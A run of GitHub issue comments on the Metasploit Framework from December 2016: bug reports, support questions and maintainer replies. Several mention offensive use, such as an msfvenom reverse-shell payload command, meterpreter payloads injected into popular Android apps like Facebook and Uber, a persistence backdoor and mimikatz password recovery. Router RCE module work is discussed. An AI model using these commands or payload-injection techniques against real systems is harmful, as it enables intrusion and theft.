What did you have in mind?  You'd want to be careful to not do something like:
1. go to the directory the module is in
2. check if module name is in there
3. if not, remove the right most character, then check if a module **starts** with the remaining string.

This could possibly have unintentional consequences.  I tried to find an example for 2min, but failed.  However, lets pretend there was:
[c

[2016-12-16 03:25] wvu-r7 commented on #7693
Too much magic can be a bad thing, too.

[2016-12-16 04:10] scriptkittie commented on #7693
@h00die  I completely agree. if valid modules match that regex then that is alone the lines of what i was thinking. if the module is not found then you could check for invalid characters(such as "." and ",").

As a sidenote, are all module names alphanumeric wth a "/" seperating them?

[2016-12-16 04:25] busterb commented on #7036
try #kali-linux on freenode. sounds like you didn't do 'apt-get dist-upgrade', or you caught kali in the middle of a package update and should try again later.

[2016-12-16 07:34] Naramsim commented on #7714
Yes, is there a way to do it? @OJ

[2016-12-16 07:51] OJ commented on #7714
No, if Meterpreter isn't running it can't possibly execute commands.

[2016-12-16 10:37] kiralxda commented on #7552
@timwr  i patched the file, now the app works great, but it doesent connect with the listener, i dont use adb

[2016-12-16 12:24] timwr commented on #7552
@kiralxda are you sure your setting up the handler correctly? Does it work on a non-injected payload (e.g without -x)?

[2016-12-16 12:40] kiralxda commented on #7552
@timwr  yes i setup the handler right, maybe i dont patch all? i  saved the new the file apk.rb and replace it in msf/core/ecc. Maybe this method works only in adb server?

[2016-12-16 13:16] Naramsim commented on #7714
ok, thanks

[2016-12-16 13:16] #7714 closed

[2016-12-16 19:51] #7582 closed

[2016-12-16 20:54] jinq102030 opened #7719 "clansphere_traversal module has extra part in the loot"
## Steps to reproduce

How'd you do it?

1. `run auxiliary/scanner/http/clansphere_traversal`
2. `set RHOSTS 127.0.0.1`
3. `run`

[code]

## Expected behavior

The loot (extracted part) should skip the HTML tag.

[2016-12-16 21:13] #7671 closed

[2016-12-16 23:11] FireFart opened #7722 "Linux reverse_tcp stager segfaults when it can't connect"
If running a meterpreter with no handler on the other side it segfaults. I think this error should be handled.

To reproduce (tried on kali):
[code]

Version:
[code]

[2016-12-16 23:27] pbarry-r7 commented on #7471
Hey @Occupy4Elephants, apologies for the delay in response.  I'd love to have a copy of that XML file to test with.  If you're comfortable with email, you could send it as an attachment to msfdev at metasploit dot com, which I have access to.   Or you could email that same address with your email address, and I can share a box folder just between us for the file handoff.  Thanks!

[2016-12-17 04:03] 0x00string opened #7723 "Msfvenom fails to generate x86 elf-so payloads"
## Steps to reproduce

1. Msfvenom -p linux/x86/shell_reverse_tcp -f elf-so

## Expected behavior

An elf-so payload is produced, as with the x86_64 format and payload (linux/x64/shell_reverse_tcp -f elf-so)

## Current behavior

The initial payload is generated, but no elf-so is generated.
[code]
Soz for poor report, I'm afk on a phone

[2016-12-17 07:52] femskey commented on #7036
i have try apt-get dist-upgrade ,apt-get upgrade and apt-get update noting happen

root@kali:/usr/share/metasploit-framework# bundle install
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root will break this application for all non-root
users on this machine.
Warning: the running version of Bundler is older than the version that created the lock

[2016-12-17 10:56] timwr commented on #7723
I can confirm this. I failed miserably at adding an armle template here: https://github.com/timwr/metasploit-framework/commit/fa92d944eeef20ff687be6cafd7291c73cbde406. x86 might be easier

[2016-12-18 03:02] aoighost commented on #7684
That fixed it, thanks @bcook-r7. For the sake of preserving my philosophy of code sharing, I'll attach working C# code for metasploit-sharp and Unity3D in the hopes others can learn from my derpery.

`    public Dictionary<string, object> ListHosts(string workspacename)
    {
        Debug.Log("listing hosts under workspace name: " + workspacename as string);

        return _session.Execute("db.h

[2016-12-18 04:13] CaptJBriggs opened #7724 "Windows version of meterpreter is not supported by this script"
## Steps to reproduce

I've created multiple payloads either by using fatrat or writing my own in msfvenom. The results are always the same.

Every other command works perfectly except for the persistent back door command e.g. run persistence

## Expected behavior

If you run, for example:
[meterpreter  session]
[type] run persistence -L c:\\ [enter] --This should send the payload to the C: drive.

[2016-12-18 04:29] wvu-r7 commented on #7724
Dupe of #7676, #7678, and #7701. Please read those tickets, thanks.

[2016-12-18 04:29] #7724 closed

[2016-12-18 08:09] islamTaha12 commented on #7659
@timwr You have to set an public IP.
- Its occurring for reverse_http and reverse_https but reverse_tcp is working well.
- Ya, Its occurring during injection only
- Payload doesn't reconnect
- I'm sure the configuration is going well.

[2016-12-18 08:47] timwr commented on #7659
Do you see anything interesting on `adb logcat` when it dies? You're on the latest version right?
The only thing I can think of this is this bug: https://github.com/rapid7/metasploit-framework/pull/7584
Perhaps you can try apply the fix and see if it makes a difference, or try inject into an apk that has not been though proguard (e.g https://github.com/heavysixer/phonegap-camera-sample/blob/master

[2016-12-18 08:54] islamTaha12 commented on #7659
@timwr I tried it with many several apk, The tricky point is if LHOST=<Local IP>, The injected apk will working fine BUT If the LHOST=<Gloabl IP>, The injection apk will send a session but it will be killed in 1 second.

Bug:#7584 used Local host IP.

[2016-12-18 12:01] islamTaha12 opened #7725 "MSfvenom error with -x apktool injection"
I ran the following command and I got this error.
![screenshot from 2016-12-18 11-52-06](https://cloud.githubusercontent.com/assets/17981089/21293346/14281ffe-c52a-11e6-8acf-165546596ff3.png)

##App source file:
https://apkpure.com/facebook/com.facebook.katana

##Version:
Framework Version: 4.13.7-dev-f0dca7abbf747a922ebfc945c84c852b817caab3

##OS:
Ubunut 16.04

[2016-12-18 14:37] timwr commented on #7725
The Facebook app does some crazy stuff due to the dex limit. You might be able to add the hook point to the Application class instead.

[2016-12-18 17:55] pyrohaz4good opened #7726 "Enabling mimicking the client's user agent"
This is in reference to closed PR #4984 and Issue #4933 that I'm now re-working after code churn in that area. Although a new common list of UAs has been added, it doesn't really address the issue. Disclaimer: this is the first time I'm adding a new feature (and hopefully the first PR I land!).

**Bottom line:**
User-agent monitoring can be used to detect unwanted egress connections from within a

[2016-12-18 19:41] CaptJBriggs commented on #7724
Thank you. Going to check it out now.

[2016-12-19 00:11] wvu-r7 commented on #7724
If you're still running into problems, let us know. FWIW, scripts have been deprecated for years, and there are a few local exploits that will do persistence. Thanks!

[2016-12-19 03:37] busterb commented on #7036
There is not much we can do from here, this is an issue with your Linux distribution. I suggest reaching out to the Kali Linux support channels.

[2016-12-19 05:15] OJ commented on #7722
That's been a known issue for aaaages.

I vote that this gets fixed by _not me_.

I also think POSIX Meterpreter will go away soon.

[2016-12-19 05:53] bcook-r7 commented on #7722
Not an issue with meterpreter, that's the Linux reverse_tcp stager not checking if it connected and receive anything before jumping into an empty buffer.

[2016-12-19 08:07] FireFart commented on #7722
Alright thanks :) Just wanted to report it in case no one has seen it before

[2016-12-19 11:50] jas502n opened #7728 "install then msfconsole error"
root@ubuntu:~# msfconsole

                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |

[2016-12-19 13:32] islamTaha12 commented on #7725
@timwr How can I do this?

[2016-12-19 13:33] islamTaha12 commented on #7725
The same issue with Uber:
![screenshot from 2016-12-19 15-31-13](https://cloud.githubusercontent.com/assets/17981089/21314566/707b46ba-c600-11e6-9171-8a12b8ffac39.png)

**App source**
https://apkpure.com/uber/com.ubercab

[2016-12-19 13:39] islamTaha12 commented on #7617
same issue with chrome app
![screenshot from 2016-12-19 15-37-37](https://cloud.githubusercontent.com/assets/17981089/21314745/56350ee8-c601-11e6-96b6-c82f1eeaffc0.png)

**App source**
https://apkpure.com/chrome-browser-google/com.android.chrome

[2016-12-19 14:04] CaptJBriggs commented on #7724
Okay so I tried everything suggested in those other comments. Still getting the same. The only thing I haven't tried yet is something called post module or something like that. Don't really know what to do there. I read they said it's run the same way as a normal exploit.
I tried this one now but still no luck.
https://www.offensive-security.com/metasploit-unleashed/writing-meterpreter-scripts/
Wh

[2016-12-19 14:53] pbarry-r7 commented on #7728
It appears your system is too low on free memory to run msfconsole (ENOMEM).  Depending on your OS, you might try the **free -m** command to see the available memory.

For future reference, support-related items are best handled here: https://community.rapid7.com/community/metasploit.

[2016-12-19 14:53] #7728 closed

[2016-12-19 16:03] islamTaha12 commented on #7725
same with Candy Crash
![screenshot from 2016-12-19 18-02-21](https://cloud.githubusercontent.com/assets/17981089/21319331/81892f52-c615-11e6-8c64-57e7bf12483b.png)

[2016-12-19 16:13] timwr commented on #7725
Thanks for reporting. I'll see what I can do

[2016-12-19 17:05] wvu-r7 commented on #7724
What you're referencing is still a Meterpreter script, not a local exploit module. The two are similar in concept but fundamentally different in execution and in implementation. You want the *module* ```exploit/windows/local/persistence``` instead.

Please hop on IRC at #metasploit on freenode or leave a question on https://community.rapid7.com/. GitHub is for bug reports and feature requests. Tha

[2016-12-19 17:08] wvu-r7 commented on #7724
(If it's any indication, notice that I'm the only one responding to you in this thread.)

[2016-12-19 17:08] wvu-r7 commented on #7724
Fixed in #7702.

[2016-12-19 17:48] wvu-r7 commented on #7722
Everyone has seen it. ;)

Real answer: to handle the error would add size to the shellcode. It can be done, but there are other syscalls that might fail, too. Best to have your handler set up first. :-)

[2016-12-19 17:50] #7719 closed

[2016-12-19 18:44] FireFart commented on #7722
@wvu-r7 except me because I always have a listener ready :D

[2016-12-19 20:50] daubsi opened #7729 "Metersploit does not seem to support SMB2"
As it seems, the Metasploit Framework does not seem to support SMB2 for SMB-related exploits like PSexec. A tcpdump confirmed that msf is only negotiating SMB1 dialects which makes our server close the connection rightaway, as these are configured to deny SMB1 traffic.

Is there a way to enable the SMB2 protocol in msf? If not yet, will it be added?

[2016-12-19 20:53] egypt commented on #7722
Put your hand up if you got mad skills. :hand: Keep it up if you got mad kills. Make fist if your handler's always ready. :fist: Shout it out. What you roll? Natural twenties!

[2016-12-19 20:53] egypt commented on #7722
In other news, I'm disappointed that there is no d20 emoji

[2016-12-19 20:55] busterb commented on #7722
how much space would folks be willing to let the linux stager grow to support proper error handling? Segfaults do show up logs typically, so it can be worth it for stealth reasons. Windows reverse_tcp is a lot bigger so it could be a good tradeoff.

[2016-12-19 21:55] egypt commented on #7729
SMB2 support has been on the roadmap for a long time, we just haven't had the time to hammer it out.

[2016-12-19 22:06] egypt commented on #7722
@busterb it's really up to the exploits. Reliable mem corruption on Linux doesn't come up much these days, but older exploits have some pretty severe size restrictions.

For example:
[code]

[2016-12-19 23:08] egypt commented on #7722
I modified ./tools/modules/module_targets.rb to print Space as well and with a little command line magic, came up with these counts:
[code]

[2016-12-19 23:13] egypt commented on #7722
Current reverse_tcp stager is 71 bytes and the smallest needed for an exploit is 130, so i feel like a little error handling should fit.

[2016-12-20 00:47] OJ commented on #7726
This is a tough one to come up with a reasonable answer for. I have pondered this myself. The thing is that user agents not only vary from browser to browser, but they can also be butchered by third party apps. So knowing the "true" user agent for a given client would best be determined by looking at a request actually made by the client.

That opens up a huge can of worms. Clearly it'd be possibl

[2016-12-20 07:14] daubsi commented on #7729
Thank you!

[2016-12-20 07:14] #7729 closed

[2016-12-20 15:55] jnqpblc commented on #7642
You, sir, are badass. It works perfectly. Thank you.

[2016-12-20 17:24] bwatters-r7 commented on #7693
Perhaps if the module is not a valid module, then we strip to the module name and reply with the response of a search command on it rather than jumping to the directory (you could fat-finger the directory name).
The problem is that the search is a little restrictive because it does not do the fuzziness you'd want, but that is fixable.

[2016-12-20 18:55] bwatters-r7 commented on #7568
Retested after a change by @OJ.  Looks like kiwi still throws the error, but mimikatz does not.  Unfortunately, it also did not recover the plain text passwords (though I was using a stock Win10x64 VM without reg changes).  Honestly, this is not a bug in metasploit per se so much as a bug in https://github.com/rapid7/mimikatz or even the parent repo https://github.com/gentilkiwi/mimikatz.

[2016-12-20 18:57] bwatters-r7 commented on #7563
Well...... it has been over a month; I'm closing this.

[2016-12-20 18:57] #7563 closed

[2016-12-20 18:58] bwatters-r7 commented on #7465
@wvu-r7 can we close this?  I seem to recall it went out a while ago.

[2016-12-20 19:44] wvu-r7 commented on #7465
@bwatters-r7: I thought it was a different vuln (#7498).

[2016-12-20 19:45] bwatters-r7 commented on #7465
That answers that question!  Thanks for the clarification, @wvu-r7!

[2016-12-20 19:51] bwatters-r7 commented on #7560
In playing with this, I saw the same behavior with calc.exe:
[code]
That called back and gave me a session, but calc did not start.  I placed it back in the system32 directory just in case there were relative path dependencies.  I've never used this, but it seems cool, so I'm going to take a deeper look if I can.

[2016-12-20 20:00] #7465 closed

[2016-12-20 20:03] wvu-r7 commented on #7693
It can also be slower. The ```use``` command already tries to instantiate a module by name, and it'll even retry if it doesn't get it the first time. If you're adding filesystem searches to that, it can get miserably slow(er).

Don't get me wrong, I like this idea! I just feel it's headed in an direction that isn't terribly performant in an effort to be nice to the user who fat-fingered the module

[2016-12-20 20:04] bwatters-r7 commented on #7693
If you want performance, then don't misspell the module name.

[2016-12-20 20:10] wvu-r7 commented on #7693
To be fair, what hasn't been said is that a trailing period is due to copying and pasting a module path, not typing it manually.

[2016-12-20 20:19] bwatters-r7 commented on #7496
It has been 6 weeks, closing.

[2016-12-20 20:19] #7496 closed

[2016-12-20 20:22] bwatters-r7 commented on #7560
Looks like this is broken.... 😢

[2016-12-20 20:35] jinq102030 commented on #7693
I don't want to misspell module names, but copying and pasting (different shortcuts on Mac or Ubuntu VM) just play joke on me :-(

[2016-12-20 20:39] wvu-r7 commented on #7693
@jinq102030: It does to me, too... I've thought about this problem but just resorted to copying and pasting more carefully. I guess y'all are onto something...

[2016-12-20 20:39] wvu-r7 commented on #7693
So who wants to write the code?

[2016-12-20 20:42] jinq102030 commented on #7693
For now, it would be sufficient to check if the module entered ends with "." and ".rb", these are the most mistake by absent-minded user who is multi-tasking.

[2016-12-20 21:31] jinq102030 opened #7732 "Default option for FILEPATH is misleading for module hp_imc_reportimgservlt_traversal"
## Steps to reproduce

Default option for module "auxiliary/scanner/http/hp_imc_reportimgservlt_traversal":  FILEPATH ==>
"/windows\win.ini" but the this module expect the http response Content-Type to be an image

[code]

The default FILEPATH should not be an ini file.

[2016-12-20 21:31] h00die commented on #7693
if you point me in a direction, i could take a stab, however, itd help if you said 'heres the line where we check to see if it exists and handle the error where we cant find it'

[2016-12-20 21:34] h00die commented on #7732
Check the documentation https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.md
...oh wait...

[2016-12-20 21:42] jinq102030 commented on #7693
Hi @h00die, I meant to say, if the module name that user entered ends with either "." or ".rb",  then just strip it out and use the remaining part as the module name.  Very simple change, but useful for those of us who are multi-tasking a lot.

[2016-12-20 21:43] wvu-r7 commented on #7693
I have a patch.

[2016-12-20 21:43] jinq102030 commented on #7693
Cool.

[2016-12-20 21:46] wvu-r7 commented on #7693
Since I've mired myself in this ticket, I'll take responsibility for the implentation. You can judge if it sucks or not. Criticisms always encouraged.

So far, the patch is fast enough for my liking, enforces a module reference name (no ```modules/``` or ```.rb```), and doesn't alter the module loader (which I've decided would be the worst thing to do).

Will PR in a sec.

[2016-12-20 21:47] wvu-r7 commented on #7693
Since I've mired myself in this ticket, I'll take responsibility for the implementation. You can judge if it sucks or not. Criticisms always encouraged.

So far, the patch is fast enough for my liking, enforces a module reference name (no ```modules/``` or ```.rb```), and doesn't alter the module loader (which I've decided would be the worst thing to do).

Will PR in a sec.

[2016-12-20 22:28] h00die commented on #7693
you can assign it to me, i'm going to get a few things touched up in the next few days so i can handle it

[2016-12-20 22:32] wvu-r7 commented on #7693
Thanks, @h00die. I've taken this experiment to its logical conclusion and benchmarked each scenario. Are we okay with a ~10 microsecond difference between ```.``` or ```.rb``` and ```modules/```? :-)

[2016-12-20 23:05] OJ commented on #7568
Howdy!

Yes this is a known issue. Patched Windows versions require Mimikatz 2.1, and the kiwi extension has 2.0 (and an older one at that).

Work is in progress to fix this though:
* https://twitter.com/TheColonial/status/811080422775918592
* https://twitter.com/TheColonial/status/811203806948003840
* https://github.com/OJ/metasploit-framework/tree/kiwi-update
* https://github.com/OJ/metasploit-p

[2016-12-20 23:23] OJ commented on #7568
So, given that this is in active development, I'm going to close this off. It has been on my TODO list for a while :) Thanks for the report.

[2016-12-20 23:23] #7568 closed

[2016-12-20 23:53] wvu-r7 commented on #7693
FYI, #4615 is why it's actually slow. #7734 bypasses that. If you know what the user meant, don't attempt the same mistake twice...

[2016-12-21 01:04] OJ opened #7736 "Session compatibility checks are broken"
We have a few fundamental problems with session validation inside post modules at the moment. They include (but might not be limited to):

* Session platform checks do a direct comparison of the platform string in the module and the platform of the session. The session platform might be `linux`, but this should work on `unix` as well in many cases, especially when the arch is set to `ARCH_CMD`.
*

[2016-12-21 02:01] wvu-r7 commented on #7736
LGTM! 👍

[2016-12-21 03:12] #7693 closed

[2016-12-21 06:00] wvu-r7 commented on #7732
The ```Content-Type``` is indeed ```image/png```, but this is a directory traversal. Could it be that the type is the same regardless of content. I don't have a test app.

[2016-12-21 06:00] wvu-r7 commented on #7732
The ```Content-Type``` is indeed ```image/png```, but this is a directory traversal. Could it be that the type is the same regardless of content? I don't have a test app.

[2016-12-21 07:12] wvu-r7 commented on #7723
This works with x64. This works *only* with x64. I'm sorry.

[2016-12-21 07:21] wvu-r7 commented on #7723
See the linked PR I created and then immediately closed. Thanks.

[2016-12-21 07:28] wvu-r7 commented on #7729
@daubsi: You can see https://github.com/rapid7/ruby_smb for a presently defunct implementation.

[2016-12-21 07:42] busterb commented on #7723
Yeah, agree @timwr, x86 doesn't look too bad, since the original template can be modified more readily with nasm. https://github.com/bcook-r7/metasploit-framework/commit/47682727de842ab0f41258bf5cac130a1ab91ca9

[2016-12-21 08:00] wvu-r7 commented on #7723
Reopening since we're close to having an x86 template.

[2016-12-21 10:29] sweet123 opened #7741 "meterpreter error not resolve"
error:- [-] This version of Meterpreter is not supported with this Script!
meterpreter > run enum_chrome
[-] This version of Meterpreter is not supported with this Script!
meterpreter >

i have use metasploit version

msf > version
Framework: 4.13.8-dev
Console  : 4.13.8-dev

msf > ruby -version
[*] exec: ruby -version

ruby 2.3.3p222 (2016-11-21) [x86_64-linux-gnu]

i have use payload or exploit

[2016-12-21 10:30] #7741 closed

[2016-12-21 15:38] jinq102030 commented on #7732
@h00die, thanks for the link, but it's not available as of now.

@wvu-r7 This will mean the default will not work when the win.ini is served, the content-type will not be ```image/png```.  Maybe remove the check on content-type is the way to go?

[2016-12-21 20:48] h00die commented on #7732
Link is a 404 on purpose, there aren't any docs to verify usage unfortunately. Hence why I'm the Grinch and always ask for them

[2016-12-21 22:54] jinq102030 commented on #7732
The test was done with a test app (emulator).

[2016-12-21 22:58] jinq102030 commented on #7732
hi @h00die,  I got your point. Will start adding module doc and coordinate with @wvu-r7 since he is working on it too. Thanks to @bcook-r7 for pointing it out.

[2016-12-22 03:26] thecarterb opened #7742 "Netgear WNR2000v5 RCE"
[https://www.exploit-db.com/exploits/40949/](https://www.exploit-db.com/exploits/40949/)

This PoC seems pretty intriguing... It's already written in ruby so I suppose we only need to add `initialize()` to make it a workable module.

[2016-12-22 04:42] wvu-r7 commented on #7742
cc @pedrib

[2016-12-22 07:12] #7642 closed

[2016-12-22 07:16] pedrib commented on #7742
@wvu-r7  @thecarterb Thanks for the interest but hold on to your horses! As I say in the advisory (link below), I'm already working on a msf module. The PoC needs some polishing and I'm currently taking care of some corner cases.

Should be finished by end of next week.

https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt

[2016-12-22 07:16] #7707 closed

[2016-12-22 07:18] pedrib commented on #7742
In this module, there's basically two ways to achieve RCE. One of them, that only works for LAN based attacks but is more reliable, requires knowledge of the MAC address of the router.

I can ask the user to enter this, but ideally I'd like to determine it automatically. Is there a way to achieve this in msf?

[2016-12-22 07:32] thecarterb commented on #7742
@pedrib I don't know about doing it _in_ msf, but this snippet from bettercap might work:
[code]

Full script from [here](https://github.com/evilsocket/bettercap/blob/master/lib/bettercap/discovery/agents/base.rb)

[2016-12-22 07:38] wvu-r7 commented on #7742
@pedrib: There really isn't a good way unless you're root and can send ARP. I suppose you could consult the ARP cache as a normal user, but how would you do that portably short of shelling out?

[2016-12-22 07:38] wvu-r7 commented on #7742
@pedrib: There really isn't a good way unless you're root and can send ARP. I suppose you could consult the ARP cache as a normal user, but how would you do that portably short of shelling out? I actually have this exact problem in a module I'm writing.

[2016-12-22 07:47] bcook-r7 commented on #7742
As a minor aside, every Kali linux user or Metasploit Pro user is root already when running Metasploit by default. You can also capture on Linux via privsep (see how wireshark does it), or by modifying bpf device rules on OS X and others. Maybe we should look at building a privsep probe capability for non-root Metasploit users. I _think_ most meterpreter sessions can get ARP entries too.

[2016-12-22 07:59] pedrib commented on #7742
@bcook-r7  non-Kali users will never run msf as root - I know I don't.
@wvu-r7 well, I'll keep working on other parts of the module, do you have a link for your WIP? If you find a way to do it let me know! Otherwise, I'll try to work around it in some other way.

[2016-12-22 08:09] wvu-r7 commented on #7742
@pedrib: Sequestered away on a local branch. Right now, the MAC address for the router comes from an ```OptString```. Far from fancy. :)

[2016-12-22 08:40] bcook-r7 commented on #6829
This is because your .msf4/database.yml file is inadvertently owned by a user that is not you. Possibly because you may have initially run metasploit as root initially.

Try ```chown -R `whoami` ~/.msf4```

Thanks!

[2016-12-22 08:40] #6829 closed

[2016-12-22 08:44] bcook-r7 commented on #4867
Fixed a while back, thanks @enioh!

[2016-12-22 08:44] #4867 closed

[2016-12-22 08:54] bcook-r7 commented on #6653
I'm going to close this since https://github.com/rapid7/rex-socket/pull/1 landed. Originally, anyone connecting on an SSL rex-socket could cause a DoS of a service simply by not continuing the handshake. Now it kicks stale connections after 3.5 seconds.

[2016-12-22 08:54] #6653 closed

[2016-12-22 16:29] dmaloney-r7 commented on #7709
@oj are you still encountering this?

[2016-12-22 22:32] wchen-r7 opened #7743 "@cnonce is always nil in rex/proto/http/client.rb"
It looks like the `@cnonce` instance variable is never set in rex/proto/http/client.rb, therefore this is always nil, and may cause the authentication to fail against some servers.

[2016-12-23 03:27] bcook-r7 opened #7745 "Creating a UUID based http/s for android creates 2 entries in payloads.json"
## Steps to reproduce

./msfvenom -p android/meterpreter/reverse_https PayloadUUIDTracking=true -o test.apk

## Expected behavior

Just one UUID in ~/.msf4/payloads.json

## Current behavior

It creates 2.

Maybe a patch like this to update it, looks like we could use some normalization between android and windows payload generation. Had a little trouble following the paths through which a UUID mi

[2016-12-24 15:49] busterb commented on #7743
Looks like this got broken many years ago when http client got refactored into a rex proto class from msf.

[2016-12-25 00:23] Occupy4Elephants commented on #7471
sure thing!  I just send you an email.  No worried about tardy replies, I'm having same issue here.  Thank you! xoxo

[2016-12-25 00:34] wvu-r7 commented on #7667
@Occupy4Elephants: Is your ```TARGETURI``` correct?

[2016-12-25 00:38] wvu-r7 commented on #7667
Hmm, nvm, looks like it is. You could look in ```lib/msf/core/exploit/http/wordpress/base.rb``` to see what request or regex is failing. If the ```wordpress_and_online?``` method is returning a false negative, we'd definitely like to know.

[2016-12-25 00:47] wvu-r7 commented on #7667
It works against 4.1.13. Sorry.

[2016-12-25 00:49] wvu-r7 commented on #7667
Not vulnerable, that is. You can short-circuit any additional testing now, I hope. I'm going to close this.

[2016-12-25 00:49] #7667 closed

[2016-12-25 00:59] wvu-r7 commented on #7667
Oh, wait, this is the ```gethostbyname()``` vuln.

If you really want to test for the vuln, you can remove the following code from the module and ```rerun``` it:

[code]

Good luck.

[2016-12-25 01:04] wvu-r7 commented on #7667
And here's the request if you want to do manual testing with Burp or whatever:

[code]

You'll want to use your own ```Host``` header.

[2016-12-25 02:46] femskey commented on #7036
ok thanks

On Mon, Dec 19, 2016 at 4:37 AM, Brent Cook <notifications@github.com>
wrote:

[2016-12-26 02:38] h00die commented on #7742
For completeness, I believe the advisory is here: http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability

[2016-12-26 13:02] pedrib commented on #7742
@h00die that's it, thanks! I'll add the link to the module references.

[2016-12-26 17:45] szachara opened #7754 "This version of Meterpreter is not supported with this Script!"
Today I have upgraded to 4.13.8 and have problem with run meterpreter's resources.

I get this error:

E.g. with meterpreter's _vnc.rb_ script at _scripts/meterpreter/vnc.rb_ is code like this:
[code]

And here is the problem, the `client.platform` variable doesn't have right value.

When the success session is created, so the session type is in this new version 4.13.8 like this:
[code]

But shoul

[2016-12-26 18:02] szachara commented on #7754
Now I compared 4.13.2..4.13.8 and 4.13.8..4.13.9 and there are many changes related to _platform_ variables.

I didn't debug `client.platform` variable, but i'm sure, that it will not contain `win32` string on x86 platform

[2016-12-26 18:46] spidyyyy opened #7755 "generate error on wmap_sites module in msfconsole"
## Steps to reproduce

How'd you do it?

whenever i put some site that is url target in it it shows unable to create site error

[code]

when i used  the -a option to add it showed an error i tried putting up domain name  as well as
ip in it please help.

## Expected behavior

What should happen?

## Current behavior

What happens instead?

You might also want to check the last ~1k lines of
`/opt/

[2016-12-26 19:10] leebaird opened #7756 "Auto complete missing for show info"
How'd you do it?
1. Load any auxiliary module.
2. show (tab 2x)
3. show info - missing

### Metasploit version
Framework: 4.13.8-dev
Console  : 4.13.8-dev

### I installed Metasploit with:
Part of Kali.

### OS
Kali Linux 2016.2 rolling

[2016-12-26 19:16] leebaird opened #7757 "Clearly show auxiliary modules that use UDP"
## Steps to reproduce

How'd you do it?

1. Load any auxiliary module.
2. show options.

What should happen?
RPORT should state if the port is UDP.

### Metasploit version
Framework: 4.13.8-dev
Console  : 4.13.8-dev

### I installed Metasploit with:
Part of Kali

### OS
Kali Linux 2016.2 rolling

[2016-12-26 22:24] pedrib commented on #7742
Given the complexity of this exploit, I am going to split it in 3 different modules:
1) exploit module for the stack overflow
2) auxiliary module for password recovery
3) exploit module for the telnetenable attack (which affects other NETGEAR routers, not just the WNR2000)

What do you think? They're almost done, I'll submit them soon.

[2016-12-27 01:07] wvu-r7 commented on #7742
@pedrib: The telnetenable module is the one I've been working on. :/

[2016-12-27 01:10] pedrib commented on #7742
@wvu-r7 have you looked at my code? I've ported it to ruby, feel free to
use it.

On Tue, 27 Dec 2016 at 01:08, wvu-r7 <notifications@github.com> wrote:

[2016-12-27 01:10] OJ commented on #7754
Yes, there are a bunch of scripts that haven't been updated since the platform changes were made. Technically these scripts are obsolete, and no longer supported. We just haven't had the chance to remove them yet.

[2016-12-27 01:12] wvu-r7 commented on #7742
@pedrib: I have not. What are you using for the crypto in telnetenable?

[2016-12-27 01:15] pedrib commented on #7742
Feel free to use my code, I spent hours trying to work around the
difference between python and ruby crypto.
I'm using openssl and it works flawlessly, check the telnetenable function
in https://github.com/pedrib/PoC/blob/master/exploits/netgearPwn.rb

On Tue, 27 Dec 2016 at 01:12, wvu-r7 <notifications@github.com> wrote:

[2016-12-27 01:22] wvu-r7 commented on #7742
@pedrib: Ugh, I spent *hours* on that as well. Looks like we have pretty similar code, down to the use of OpenSSL, except my module's been sitting incomplete for a couple years now...

If you'll let me finish the module, I'll add you to the credits when I PR it? I'm attempting to support both TCP and UDP methods of access in one module, which may be a bit radical.

[2016-12-27 01:27] pedrib commented on #7742
The secret is in the order of arguments you pass to openssl. Had to ask the
ruby devs to get it right.

I think my telnetenable function works flawlessly, and looking at the code
it seems all you need to make it work in older routers is to use tcp
instead of udp, all else seems the same.

Please use the code and finish it, I won't release the telnetenable module
then.

On Tue, 27 Dec 2016 at 01:22

[2016-12-27 01:31] wvu-r7 commented on #7742
@pedrib: Sounds good, thanks. I'll tag you when it's PR'd.

[2016-12-27 04:47] Occupy4Elephants commented on #7667
ok.  thank you for your help.

[2016-12-27 14:08] wvu-r7 commented on #7756
@leebaird: Can you explain a bit what you'd like to see? Kinda confused here, sorry.

[2016-12-27 14:10] wvu-r7 commented on #7757
I couldn't find the ticket, but there was a request like this before. Problem was it involved a huge architectural change, IIRC. Do you remember this, @todb-r7?

[2016-12-27 14:21] crash21 commented on #7754
Is there an alternative away to run vnc now or something similar?

[2016-12-27 14:37] leebaird commented on #7757
It shouldn't require a huge change. Look for the UDP protocol inside of the module.

[2016-12-27 15:15] bwatters-r7 commented on #7709
@OJ, did https://github.com/rapid7/metasploit-framework/pull/7739 fix this?

[2016-12-27 15:17] todb commented on #7757
@wvu-r7 iirc the yuge classy arch change was an ability to flip between UDP
and TCP. Merely noting UDP in info or options or something should be
straight forward.

I'll take it, it's bugged me forever as well.

[2016-12-27 15:26] AshBringeR opened #7759 "Windows msfconsole startup error"
Windows 8.1 Professional [x64]
Non-Virtual
metasploit-framework 4.13.10+20161227102523-1rapid7
[code]

[2016-12-27 19:42] bcook-r7 commented on #7755
what error did you get? '-h' just shows the help output and this is expected.

[2016-12-27 21:57] wvu-r7 commented on #7756
Gotcha.

[2016-12-27 22:00] wvu-r7 commented on #7756
@leebaird: There's a ```show missing```, so I was confused. Thanks.

[2016-12-27 22:02] #7756 closed

[2016-12-27 22:33] todb commented on #7757
#soverylazy

I'll float something tomorrow morning.

[2016-12-27 22:36] wvu-r7 commented on #7757
Ahh, right, the ability to use TCP and UDP in one module was the big one. I'm actually working on that. :P

[2016-12-27 23:26] OJ commented on #7754
I can't see a post module for this, but it's pretty simple to manually create a VNC listener and payload and fire it off.

[2016-12-28 01:46] aushack commented on #7558
Oh yeah this was sent https://github.com/rapid7/metasploit-framework/pull/3658 but I already finished that pentest... been a few years. The other one is https://github.com/rapid7/metasploit-framework/pull/1074 FYI.

[2016-12-28 11:34] wvu-r7 commented on #7754
Scripts aren't supported as @OJ explained. There isn't actually a post module or local exploit, but you can do the same with ```payload_inject``` or whatever.

[2016-12-28 11:34] #7754 closed

